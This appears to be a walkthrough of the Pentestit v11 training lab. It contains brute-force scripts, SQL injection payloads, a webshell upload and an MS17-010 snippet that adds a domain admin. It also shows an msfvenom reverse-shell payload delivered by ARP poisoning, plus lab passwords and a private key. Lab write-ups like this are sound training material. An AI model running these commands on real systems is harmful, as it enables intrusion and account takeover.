Pentestit v11

Hey all,

Lately, I’ve been dedicating my spare time to Pentestit v11, a terrific pentest lab which is great to hone those skills.  If you have the spare time, I highly recommend participating – lab.pentestit.ru.

Version 11 is named “Who is Mr. Hacker?”.  To start, we are given a network diagram and two target IP addresses: 192.168.101.10 and 192.168.101.11.  For this post, I’ve created my own network diagram so I can mark it up along the way.

Obviously there are spoilers ahead.

The Target

External Enumeration

With the initial lab VPN connection established, we begin by scanning the two given IP addresses.

192.168.101.10 TCP/80 is a wordpress blog site that doesn’t have much in the way of surface area.  Scanning this site will quickly reveal that there is a web application firewall (WAF) between us and the site.  Note, when scanning, use a different user-agent or you will be filtered.

So not too much, but let’s keep the kittycatfish plugin in mind because we’ll end up using that later.

192.168.101.10 TCP/8080 is a roundcube webmail login page, but without a valid email address it doesn’t offer much in the way of attack surface.

192.168.101.10 TCP/25 is a SMTP server that has VRFY and EXPN disabled.  Additionally, an error message is thrown when trying to enumerate users via RCPT TO, not much there.

192.168.101.11 TCP/2222 is a SSH server using key pair authentication.

192.168.101.10 TCP/88 is a Vtiger v6.3.0 CRM site with a login page which looks promising.

CRM

The application version is printed right on the login page in the clear, very kind of vtiger.  For this version, there is an authenticated RCE vulnerability, but first we’ll need to find valid credentials before being able to access this vulnerability.  The vtiger wiki lists the default credentials as admin/admin, but unfortunately the password has been changed.  At this point let’s use patator to start a brute force attack.  There is a anti cross-site request forgery (CSRF) token; however, to be honest, I’m not sure if this is enforced during login as there are no error messages when submitted an incorrect token.  Either way, it’s not a bad idea to GET and POST the correct anti-CSRF token (__vtrftk), just in case.

Using gotmilk’s blog post as a reference I put together this patator startup script.

#!/bin/bash
bulk=$(curl -sD headers.txt -A "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" "http://192.168.101.10:88/index.php")
echo ${bulk}
CSRF=$(echo ${bulk} |grep "sid:" | cut -d ":" -f3 | cut -d ";" -f1)
SESSID=$(cat headers.txt | grep PHPSESSID | cut -d " " -f2 | cut -d ";" -f1)
echo ${CSRF}
echo ${SESSID}

python /root/tools/patator/patator.py http_fuzz url="http://192.168.101.10:88/index.php?module=Users&action=Login" method=POST body="__vtrftk=sid:_CSRF_&username=admin&password=FILE0" 0=rockyou.txt follow=1 accept_cookie=0 header="Cookie: ${SESSID}" before_urls="http://192.168.101.10:88/index.php" before_header="Cookie: ${SESSID}" before_egrep='_CSRF_:var csrfMagicToken = "(\S+)"' -x ignore:egrep="Invalid username or password"

As seen above, the wordlist rockyou.txt was used, it’s pretty beefy and will take a while.  I recommend bruteforcing over the night and maybe starting a second bruteforce task in tandem using a reverse rockyou wordlist.  Either that, or just look below.

Also, it’s not a bad idea to do a demo run through burpsuite just to make sure the requests and responses are as expected.  With patator patator (v0.7), add the following:

proxy=http://127.0.0.1:8080 proxy_type=http

With valid credentials, we are able to access that authenticated RCE vulnerability.  To navigate to the vulnerable page, start by selecting the gear in the top right corner –> CRM Settings –> Templates –> Company Details –> Edit –> Browse –> Save.  Attempting to upload a php shell will get rejected so instead, upload a image and send the legitimate web transaction to the repeater module in burpsuite.  With repeater, we can submit multiple requests without the hassle of resubmitting and constantly intercepting.  Below is an example of a simple php command shell upload.

If everything worked the webshell should have been uploaded to the /test/logo directory.  Note, if the word “php” is in your shell the page will throw an error.  So if you’re looking to upload a webshell with a few more features like B374K, use a base64 encoded version … just remember to remove “php” at the top.

Exploring the filesystem will quickly reveal the CRM token, named rce_token.txt.

Within the CRM admin page, looking at Darthvader’s user preferences we see some key information that can aid in other attacks.  To see this information, start in the upper right corner and select preferences from the drop down menu named darthvader.

Great, we have an email address which might open up an avenue on the roundcube webmail page.  While Vader is the man when it comes to overthrowing the oppression of the Jedi, fortunately for us, he sucks at passwords.  On roundcube, username: admin@test.lab and password: darthvader.

Copy the private key from the email and SSH into the second office at 192.168.101.11, as per the network diagram.

ssh tech@192.168.101.11 -p 2222 -i ssh-office2-priv.key

As expected, we now have access to subnet 192.168.13.0/24 or the second office.  In the directory /etc/openvpn there is a openvpn configuration file for connecting to TCP/1194 on 192.168.101.10.

We do not have permissions to read /opt/openvpn/auth.txt; however, it does appear that the authentication username is Office-2.  We will need this file later on but for now, let’s shift focus back to 192.168.13.0/24.  Scanning each of the endpoints reveals that RDP or TCP/3389 are the only open ports.

RDP

With nothing beyond RDP access to the endpoints in 192.168.13.0/24 subnet, we’re probably looking at a bruteforce attack again.  Using proxychains, enumerate the RDP users on each of the potential targets.

ssh tech@192.168.101.11 -D 9000 -p 2222 -i ssh-office2-priv.key
proxychains xfreerdp /sec:tls /u:"" /v:192.168.13.1

• 192.168.13.1
  • arm554
  • user
• 192.168.13.2
  • arm550
  • user
• 192.168.13.3
  • arm672
  • user

Naturally, you might think that the user account and maybe even the arm accounts share the same password, not the case.  Take my word for it, bruteforce arm554 on 192.168.13.1.

ssh -L 3389:192.168.13.1:3389 -p 2222 -i ssh-office2-priv.key tech@192.168.101.11
crowbar -u arm554 -s 127.0.0.1/32 -l log.txt -o out.txt -b rdp -C /usr/share/john/password.lst

RDP into 192.168.13.1 with arm554 and redirect /tmp to transfer files.

proxychains xfreerdp /v:192.168.13.1 /sec:tls /u:arm554 /p:tiger /drive:test,/tmp/

Arm554 is an underprivileged user account on a vanilla Windows 7 machine without any patches installed.  There are plenty of options, I used a powershell MS16-032 exploit, eliminating the need to compile.  After escalating privileges, we find the token on user’s desktop.

Additionally, there is a directory called “Old test.lab users” which has a collection of files containing details about various users, including a NT hash.  This will work into one of the following challenges, but I’m not going to lie, I missed this the first time around.

There isn’t anything else to grab from 192.168.13.0/24, let’s step back and focus on the server.conf openvpn configuration file obtained from 192.168.101.11.  Modify server.conf to bruteforce the openvpn server on 192.168.101.10 by removing the pointer to the auth-user-pass authentication file.  Additionally, copy the certificate to a separate file – openvpn.crt.

And using crowbar we spin up the bruteforce attack.

crowbar -s 192.168.101.10/32 -b openvpn --config /root/CTFs/Pentestit/v11/server.conf --username Office-2 -k /root/CTFs/Pentestit/v11/openvpn.crt -C /usr/share/john/password.lst

Stepping out, here is where we are at.

By establishing a VPN connection to 192.168.101.10, we are able to bypass the WAF protecting SITE (172.16.0.11).

SITE

Recall the WordPress Kittycatfish vulnerability which was enumerated with wpscan during external enumeration.

http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0

While poking around the vulnerable page, I noticed that the left parameter disappears if the GET request is false.  For example, if kc_ad=16 then left: 50%; is on the page; however, if kc_ad=32 or kc_ad=16 AND 1=2 then left: 50%; is instead : px;.

Knowing this we are able to enumerate with sqlmap using the string switch.  The string switch basically evaluates the server response for the given value and if the value is present on the page then the injection is considered successful.

sqlmap --random-agent -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;"

Using sqlmap, walking through the databases and tables is pretty straightforward, if you need help jump over to the usage guide. The SITE token is in the database and can be enumerated using the sqlmap line below.

sqlmap --random-agent -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;" -D testlabdb -T tl_token --dump

CUPS

Browsing to http://172.16.0.14 responds with two options: admin panel and local storage.  Local storage brings us to a login prompt which is vulnerable to sql injection.  If it’s a bit difficult to see – username: a’ OR 1=1;– / password: whatever

Bypassing the login page brings us to an scan page with quite a few images along with their filenames.  One image filename is entirely different from all the others, plugging the string into a hex to ascii converter gives us the CUPS token.

Additionally, there is an image with a RSA private key, obviously we’ll need that for later.

AD

Enumerating with nmap we find that 172.16.0.10 is a domain controller of the test.lab domain (the name, duh).  Using the metasploit module  auxiliary/gather/kerberos_enumusers we are able to enumerate accounts on the domain.

As seen above, account arm554 is present in the test.lab domain.  Using the information we acquired from the RDP target, pass the hash to gain access to the files fileshare.  Token.txt is the AD token and network_test.txt has credentials for the next challenge.  The contents of network_test.txt is as follows:

Hi, mate! Need to test ARP-table in DIR subnet.
I'll install intercepter admin:77_GrantedSuperAdmin_77

To be honest, the first time through I did not grab the AD token by passing the hash.  Instead, I used MS17-010 to gain access with a few modifications.

def smb_pwn(conn):
        smbConn = conn.get_smbconnection() 
        service_exec(conn, r'cmd /c net user cplsec P@ssw0rd123! /add && net group "domain admins" cplsec /add /domain')

However, don’t fling exploit code where not needed, use pth.

Recall, we acquired an image of a SSH private key for 172.16.0.252.  After unsuccessfully playing around with various OCR solutions, I manually typed out the private key, it was not fun … you’re welcome.

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4CxmKK2/kvV0+srp24bVZm+yYvCz+rvgHHxX1w7F0oD8aUDI
won79K9XpntFDPUvtJRMg9WqK/zKUwLsMQLGWT66PT4GVbQw4Nr56rOrBIuag/qg
o9WcX0AfIyFYFCNz0TnLfRXSDcSQY0CRK8WfKx5c8uP2kudtzAGv5GQCpSjM2uNV
shOu7xmgo/AMUQvPi8kvD/gAme9G8WkTgpVpAwlsthjxQ9fEO6abHHkjbGGec0O8
4T7Bo2nU8bHjr6Jd+dzUAvytblG1yNvGIybAFAsVqUHjbt9wGZgFKr1kA+3ZCbyF
qFZZ37dpZr2grZXwzlCtPUJGuMfCq7N0ZhmcAwIDAQABAoIBAQDCXPx+TJcLXhJ8
164HjlI8LKAoNLZ3sKlRSWYHqmFOcFNpFqh6M5Tmw5hlWf+2imdAVEw7Cegvl0/8
xU3v+I3tFvv22W44pLC0ZGfHXNvsZvYjdAwPwMeBtmDI3sI1Q7/JKikKXP7wvPrL
c1Hq979XbU39sjU5jbqe5N+SUDwS4Tu79L0uXehnqvCSlyIU9joDhvW87DeaLRaQ
wwkKR9gnPtiKebZ73VGParJ42CZlRgfEOvoLWUk+YrhRfZ9r4uva0IHbZ1LhqNcL
k0OlKEDUDzuju0/YwgBSZVSrhkCAnCnipsxQMc4g2aytPOTdKz4BtF+cZV/rXhyM
kSPIeh1xAoGBAPJfcCQWqsq/dwwOC9I9jWj4W9xAFPbaPSq1oGwNr0ugZ/4DZLGe
glGte8iG/Tc1Lb1Ege2dYPRR5OeFhyo8tADPKleFvDBYGN2asf4JirljxrW5F+ON
q5paXqjbaBKk/Z6f08UlwxjSHRHOWqEvYZkm5bAxrufNKBVpwVWHU6eNAoGBAOzH
AryHBdo45qLnzJR87zDftNNrua1VmhWu+h+I7zj4hr52gM/TheHL/ODJZCyZU3vt
7ncDjUM91xwh63vkCiByEYk4vTGnmaj9brmndracJ7jwwSUn/YqPj0D3yD0lrpxd
PLn0c1ic5jaoTSWZN748PoPnP+CPvhjQYvxX5OXPAoGALmnEScTlc+nyXCaccOhE
miNlQ+opmZP1PqaFT+vW876F64iu0ayu/AEiwSXIe7f9SE9EKkKG/IJqOUPCvH3f
YoBJdXUwsnlMWbNz/lfJbvMCbG5Detn4UJiZo/BQH7Hkt2mX3hr7H1etJWnExTUT
lYZzWahJ/C23TVJxKXW+uUkCgYEAnLDOhMit/M3vAxt27UUIXUWNuuPtSmH9yB+1
cq0B8qe1M9HkSKRoUxbVUES2QDVvY/H+/0+gakFAW2OvHJu6f+I87JxZx8RsEcM1
RTMngo0wVFku2FHwnYOHf6z6HE0VknC5QS4eLyQVzVHvS9RraT8g99VPFmLJoE43
U1svJU0CgYAecYtH3ZvIwPA85sTuTkKAGMmvRxzPnQkyiUF9BwN+B1mfL4uZyJVy
VVWhCwXf/h9G3fKzuV0m0Dz6O7r5DqRqs0uCNbxPaS8qWPcRckwV2Y9htMjXLyXU
nOV4UZBbQSXb/AoSFdcCBjonbudkiAxzm0STdiQ92kZNavvfZAjXQw==
-----END RSA PRIVATE KEY-----

Spin up a SOCKS proxy and connect to 192.168.12.2 using the credentials we acquired from AD.

ssh -D 9000 -i CTFs/Pentestit/v11/manualkey.txt morgan@172.16.0.252
proxychains xfreerdp /u:admin /p:77_GrantedSuperAdmin_77 /v:192.168.12.2 /drive:test,/tmp/

In c:\soft there are a collection of files including Intercepter-NG and netcat for Windows.  Smart scan the network, assign 192.168.12.1 as a target, and set 192.168.12.3 as the gateway.

Use a pcap filter in RAW mode to show traffic from 192.168.12.1 and 192.168.12.3 only.

host 192.168.12.1 or 192.168.12.3

Start the sniffer, NAT, and ARP poison in the MITM mode section.  If everything was configured correctly we should see a HTTP request which was intercepted from 192.168.12.1 destined for 192.168.12.3.

As seen above, 192.168.12.1 is requesting quake3.exe.  Using msfvenom, generate stageless reverse tcp shell for Windows.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.12.2 LPORT=443 -f exe > quake3.exe

Copy quake3.exe over to 192.168.12.2 and using Intercetper’s injection rules, create a rule to inject our reverse shell exe when 192.168.12.1 comes knocking.

Restart the ARP poison attack and start to listen on port 443 with netcat (run as administrator while opening the ports in the host firewall).  Eventually, a reverse shell should spawn from 192.168.12.1.  The token along with a SSH key for 192.168.11.1 can be found in the c:\users\director\documents directory.

Once again, stepping out, here is where we are at.